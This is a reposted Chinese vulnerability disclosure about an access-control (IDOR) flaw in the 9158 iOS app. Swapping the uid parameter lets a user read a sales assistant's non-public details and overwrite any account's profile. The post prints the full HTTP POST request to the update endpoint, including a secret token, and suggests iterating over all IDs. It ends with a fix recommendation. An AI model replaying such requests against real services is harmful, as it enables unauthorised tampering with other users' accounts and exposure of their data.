頻道欄目
首頁 > 資訊 > 網站安全 > 正文

天格科技某處越權漏洞可修改任意賬戶資料

14-09-20        來源:[db:作者]  
收藏   我要投稿

天格科技某處越權漏洞可修改任意賬戶資料

問題存在于天格科技的蘋果客戶端。安卓下目測存在同樣的問題。

下載方式位于http://mobile.9158.com/ 或直接91助手搜索9158

進入客戶端,注冊帳號。我們點擊個人資料
 

1.PNG



我們看下數據包
 

2.jpg



發現了用戶ID的參數,而在首頁,我發現了9158公司VIP銷售助理的ID
 

3.jpg



我們把ID改為30400試試
 

4.PNG



可以看到,成功讀取了該銷售助理的信息,包括不對外公開的登錄用戶名

那么我們繼續嘗試更改信息,點擊保存


 

POST /user/updateInfo_new.aspx? HTTP/1.1
Host: mobile.9158.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Accept-Language: zh-cn
Accept: */*
Pragma: no-cache
Content-Length: 827
Connection: keep-alive
User-Agent: ChatRoom/1.0.7 CFNetwork/609.1.4 Darwin/13.0.0

--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="uid"

30400
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="secret"

d37ab3012c38a3ad1b96e90dffc1d0cc
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="city"

o??Y
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="name"

VIP?úê??úàí
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="gender"

0
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="birthday"

19910101
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
Content-Disposition: form-data; name="province"

???-
--293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw





我把用戶名加了個句號,發現成功更改掉了。
 

5.jpg



gender是性別,默認不可更改,但是通過改數據可以實現,0為女,1為男。

至于uid不用解釋了吧。



如果我把ID遍歷一遍,那么全站的用戶信息都會被改掉了。
 

修復方案:

添加接口認證

相關TAG標簽
上一篇:臺積電:絕大多數7nm客戶都會轉向6nm_IT新聞_博客園
下一篇:最后一頁
相關文章
圖文推薦

關于我們 | 聯系我們 | 廣告服務 | 投資合作 | 版權申明 | 在線幫助 | 網站地圖 | 作品發布 | Vip技術培訓 | 舉報中心

版權所有: 紅黑聯盟--致力于做實用的IT技術學習網站

美女MM131爽爽爽毛片